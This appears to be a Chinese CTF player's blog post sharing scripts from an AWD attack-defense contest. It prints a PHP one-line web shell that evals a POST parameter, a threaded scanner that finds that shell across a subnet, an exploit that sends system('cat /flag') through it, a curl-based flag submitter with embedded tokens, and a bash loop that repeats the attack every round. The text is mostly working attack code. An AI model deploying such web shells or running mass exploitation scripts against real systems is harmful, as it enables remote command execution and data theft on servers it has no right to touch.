awd一句话木马批量攻击脚本


awd的批量攻击一直都在看pwnweb准备过几个脚本但还没实践过,这次上海市赛决赛现场调了一下批量攻击一句话木马的脚本,也是在现场废了不少时间…拿pwn的脚本改的,感觉web手的脚本会比我的简洁欸,凑合看

扫描ip

一句话木马在文件在/assets/scripts/pass.php,内容如下:

<?php @eval($_POST['pass']);?>

在获取hosts的时候需要将url中的格式修改成木马文件的路径,init_hosts.py脚本如下

import requests
import threading

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

def check_ip(i):
    try:
        url = f'http://10.103.{i}.1/assets/scripts/pass.php'
        response = requests.get(url, timeout=0.5)
        if response.status_code == 200:
            li('[+] ' + url)
            with open('hosts', 'a+') as f:
                f.write(f'http://10.103.{i}.1/assets/scripts/pass.php\n')
        else:
            raise Exception("Not 200 OK")
    except Exception as e:
        ll('[-] ' + url)
        with open('h', 'a+') as f:
            f.write(f'http://10.103.{i}.1/assets/scripts/pass.php\n')

NUM_THREADS = 256

threads = []
for i in range(1, 256):
    thread = threading.Thread(target=check_ip, args=(i,))
    threads.append(thread)
    thread.start()

    if len(threads) >= NUM_THREADS:
        for t in threads:
            t.join()
        threads = []

for t in threads:
    t.join()

攻击脚本

需要修改data中的连接密码,例如本题是passexp.py代码如下

import requests
import os
import sys
from time import sleep
from pwn import *

def write_to_flags(d):
    fd = open('./flags', 'ab')
    fd.write(d + b'\n')
    fd.close()

url = sys.argv[1]
print(url)

data = {
    "pass": "system('cat /flag');"
}

response = requests.post(url=url, data=data)

if response.status_code == 200:
    flag = response.text.strip()
    print(flag)
    write_to_flags(flag.encode())
    print("Flag 已写入到 flags 文件中。")
else:
    print("获取 flag 失败:", response.status_code)

批量提交flag脚本

url格式也搞了好一会…得重学python了唉。submit_flag.py脚本如下:

import threading
from time import sleep
import os
import json
import requests

flag_file = './flags'
threads = []

def submit(flag):
    try:
        # url = 'https://ctf.bugku.com/awd/submit.html?token=88b02ce3b420ec1f4b4a2e02dd6fe305&flag=' + flag[:-1]
        #url = f"curl -X POST http://27.25.152.77:19999/api/flag -H 'Authorization: 7f120ca9b0e3024d06734a04a986cc55' -d '{{ \"flag\": \"{flag[:-1]}\"}}'"
        url = "curl -k -H \"Content-Type:application/json\" -X POST -d '{\"token\": \"0c9651851218f216253a2b0d84d24cfd\", \"flag\":\""
        url += flag[:-1]
        url += "\", \"pk\":\"be7e7b26c6a5235bcedc8531d6bfd648\"}\' \'https://10.10.26.231/api/awd/batch_flag/\'"
        print(url)
        # r = requests.get(url)
        os.system(url)
        print('\x1b[01;38;5;214m[+] pwned!\x1b[0m')
    except Exception as e:
        print('\x1b[01;38;5;214m[-] connect fail: {}\x1b[0m'.format(str(e)))

def main():
    with open(flag_file) as flag_txt:
        flags = flag_txt.readlines()
        for flag in flags:
            thread = threading.Thread(target=submit, args=(flag,))
            threads.append(thread)
            thread.start()

        for thread in threads:
            thread.join()

if __name__ == "__main__":
    main()

批量攻击脚本

批量攻击脚本attack.sh如下

#! /bin/bash

attack_times=10000
round_wait_time=30 # 20 min
wait_submit_time=5 # 20 s
log_file="logs"
run_time=120 #timeout
next_attack_time=2.5 #half time
max_concurrent_attacks=10 # Max number of concurrent attacks

log(){
    t=$(date "+%H:%M:%S")
    m="[$t]$1" # Fixed missing parameter usage
    info="\033[43;37m $m \033[0m"
    echo -e "$info"
    echo -e "$m" >> $log_file
}

attack() {
    echo "-- round $1 -- " >> all_flags
    cat flags >> all_flags
    rm flags
    local jobs=0
    for line in $(cat hosts); do
        timeout --foreground $run_time python3 ./exp.py "$line" &
        sleep $next_attack_time
        ((jobs++))
        if [ "$jobs" -ge "$max_concurrent_attacks" ]; then
            wait # Wait for all background jobs to finish
            jobs=0
        fi
    done
    wait # Ensure all attacks are complete before moving on
    echo -e "\x1b[47;30m Waiting $wait_submit_time s to submit flag\x1b[0m"
    sleep $wait_submit_time
    echo -e "\x1b[47;30m Submitting flag\x1b[0m"
    python3 ./submit_flag.py
}

for ((i=1; i <= attack_times; i++)); do
    m="-------- round $i --------"
    log "$m"
    attack $i
    echo -e "\x1b[47;30m Waiting next round\x1b[0m"
    sleep $round_wait_time
done

  目录